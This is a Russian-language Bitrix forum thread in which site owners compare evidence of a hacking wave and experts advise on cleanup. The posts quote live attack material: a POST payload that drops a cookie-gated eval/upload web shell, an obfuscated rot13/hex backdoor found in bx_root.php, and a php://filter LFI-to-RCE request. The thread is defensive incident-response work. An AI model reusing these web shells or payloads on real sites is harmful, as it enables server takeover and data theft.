Разработчикам

Форум

Взломаны сайты в честь дня конституции украины

Пользователь 1991131 Заглянувший Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018	#421 0 01.03.2023 21:25:04 кстати интересный htaccess там же лежит ( /bitrix/modules/iblock/lib/bizproctype/ ) <FilesMatch ".(php\|php5\|phtml)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(access.php\|wp.php\|term.php\|locale.php\|themes.php\|network.php\|container.php\|router.php\|wp-login.php)$"> Order allow,deny Allow from all </FilesMatch>

Пользователь 7087514

Заглянувший

Сообщений: 1 Регистрация: 02.03.2023

#422

02.03.2023 00:20:17

Цитата
написал: dmitry920, Вы бы лучше на этой главной содержимое $_POST запроса куда нить в файлик сохранили и сюда запостили, тогда можно найти адресата

Код

Array
(
    [bitrixxx] => file_put_contents($_SERVER['DOCUMENT_ROOT'].'/bitrix/admin/b7c01fefc3c7.php','<?=409723*20;if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST[id]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>');
)

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#423 0 02.03.2023 03:42:27 Александр, теперь поиском по всем php файлам ищите bitixxx И в агентах ещё обязательно проверьте заразу Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#424

02.03.2023 05:47:02

тут новенький почему то не может в тему написать, кинул в личку - репост ниже
лично я таких POST ещё не встречал, думаю просто совпадение

Цитата

Не знаю почему не могу написать. Новенький наверное.Первые факты взлома у нас 15.02.2023. Ломают через уязвимость
LFI2RCE via PHP Filters.

POST запрос выглядит так:
"POST /products/index.php?ID=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|.........|convert.base64-decode/resource=php://temp HTTP/1.1" 200 15544 "-" "firefox"
Будет создан веб-шелл через который дальше будут лить все подряд. Я в 1С Битрикс впервые. Как правильно задушить такие запрос? Понятно что запрет POST везде решит проблему. Но хотелось бы понять как это сделать правильно

я бы для начала так же как в предыдущем случае попробовал изучить запрос более детально
сохранил бы $_GET $_POST параметры (я так понимаю в лог полностью $_GET не влез, а было бы интересно взглянуть)

т.е. в /products/index.php в самое начало и mail() для оповещения перед die()

Код

@mkdir('logs');
if(!empty($_POST)) {
   file_put_contents('./logs/post-'.time().'.log', var_export($_POST, true));
   file_put_contents('./logs/get-'.time().'.log', var_export($_GET, true));
    die('hack attempt');
}

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 4148622

Заглянувший

Сообщений: 3 Регистрация: 24.04.2020

#425

02.03.2023 09:28:15

Вчера, повторно, поле 24 февраля сайт упал. Во всех разделах создались файлы .htaccess и был вставлен зловредный код в код index.php. После анализа логов было обнаружено что в папке admin были созданы бекдоры с рандомными именами. Создавались эти бекдоры POST запросом к главной странице сайта. Вчера вечером по вашему совету поставил логирования POST запросов к главной странице и это дало результаты. Вот такие запросы прилетают:

Код

array (  
 'BX_STAT' => '303q66696p655s7075745s636s6r74656r747326313q6269747269782s61646q696r2s6561323033363065653039302r70687026323q3p3s3q3430393732332n32303o6966286q643528245s434s4s4o49455o645q293q3q22313730323866343837636232613834363037363436646133616433383738656322297o6563686s226s6o223o6576616p286261736536345s6465636s646528245s524551554553545o69645q29293o696628245s504s53545o227570225q3q3q22757022297o40636s707928245s46494p45535o2266696p65225q5o22746q705s6r616q65225q2p245s46494p45535o2266696p65225q5o226r616q65225q293o7q7q3s3r', 
)

обнаружил код в файле \bitrix\modules\main\bx_root.php

Код
<? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?>

Что интересно дата bx_root.php такая же как у всех файлов ядра. В других дистрибутивах этого кода не обнаружил и поэтому удалил его. Наблюдаю дальше.

P.S Битрикс 18.5.180.

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

#426

02.03.2023 10:52:40

Цитата

написал:
Вчера, повторно, поле 24 февраля сайт упал. Во всех разделах создались файлы .htaccess и был вставлен зловредный код в код index.php. После анализа логов было обнаружено что в папке admin были созданы бекдоры с рандомными именами. Создавались эти бекдоры POST запросом к главной странице сайта. Вчера вечером по вашему совету поставил логирования POST запросов к главной странице и это дало результаты. Вот такие запросы прилетают:

Код

  array  (  
  'BX_STAT'  =>  '303q66696p655s7075745s636s6r74656r747326313q6269747269782s61646q696r2s6561323033363065653039302r70687026323q3p3s3q3430393732332n32303o6966286q643528245s434s4s4o49455o645q293q3q22313730323866343837636232613834363037363436646133616433383738656322297o6563686s226s6o223o6576616p286261736536345s6465636s646528245s524551554553545o69645q29293o696628245s504s53545o227570225q3q3q22757022297o40636s707928245s46494p45535o2266696p65225q5o22746q705s6r616q65225q2p245s46494p45535o2266696p65225q5o226r616q65225q293o7q7q3s3r' , 
)

обнаружил код в файле \bitrix\modules\main\bx_root.php

Код

   <? 
  if  ( isset ( $_POST [ "BX_STAT" ]) &&  $_POST [ "BX_STAT" ] <>  "" )    parse_str(hex2bin(str_rot13( $_POST [ "BX_STAT" ])), $bx_stat )  or   die (str_rot13(bin2hex( $bx_stat [ 0 ]( $bx_stat [ 1 ], $bx_stat [ 2 ]))));
  ?>

у меня в этом файле вот что

Код

<?
/*
$fname1 = __FILE__;
$fname2 = $_SERVER["DOCUMENT_ROOT"];
if(strpos($fname1, $fname2)!==0)
{
   $fname1 = realpath(__FILE__);
   $fname2 = realpath($_SERVER["DOCUMENT_ROOT"]);
}

if(strpos($fname1, $fname2)===0)
{
   $fname3 = RTrim($_SERVER["DOCUMENT_ROOT"], " /\\");
   $bx_root = substr($fname1, strlen($fname3));
   $bx_root = substr($bx_root, 0, strlen($bx_root) - strlen("/modules/main/include.php"));
}
else
   $bx_root = "/bitrix";

$bx_root = str_replace("\\", "/", $bx_root);
*/
$bx_root = "/bitrix";
define("BX_ROOT", $bx_root);

if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "")
   define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]);
else
   define("BX_PERSONAL_ROOT", BX_ROOT);

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));


if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
?>

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#427

02.03.2023 11:02:54

ну если интересно что тут происходит можно
загнать в $_POST["BX_STAT"] содержимое post запроса, разделить функции на поэтапный вызов и дебаггером посмотреть
заодно по стеку вызовов глянуть как он подключается

если не интересно грохаем файлик и следим дальше

ну и первое, что нужно было сделать - конечно обновить лицензию и ядро

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

#428

02.03.2023 11:07:29

Цитата

написал:
ну если интересно что тут происходит можно
загнать в $_POST["BX_STAT"] содержимое post запроса, разделить функции на поэтапный вызов и дебаггером посмотреть
заодно по стеку вызовов глянуть как он подключается

если не интересно грохаем файлик и следим дальше

ну и первое, что нужно было сделать - конечно обновить лицензию и ядро

Стоит решение хамелеон с 10 торгующими лендингами. Существует ли риск потерять все это после обновления?

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#429 0 02.03.2023 11:11:45 ну это к создателям решения, по идее обновление не должно что-то ухудшить сделайте полный бэкап и проверьте Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1991131 Заглянувший Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018	#430 0 02.03.2023 13:30:45 Сегодня еще один схожий пациент пришел на лечение) Старый сайт, движок не обновлялся

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером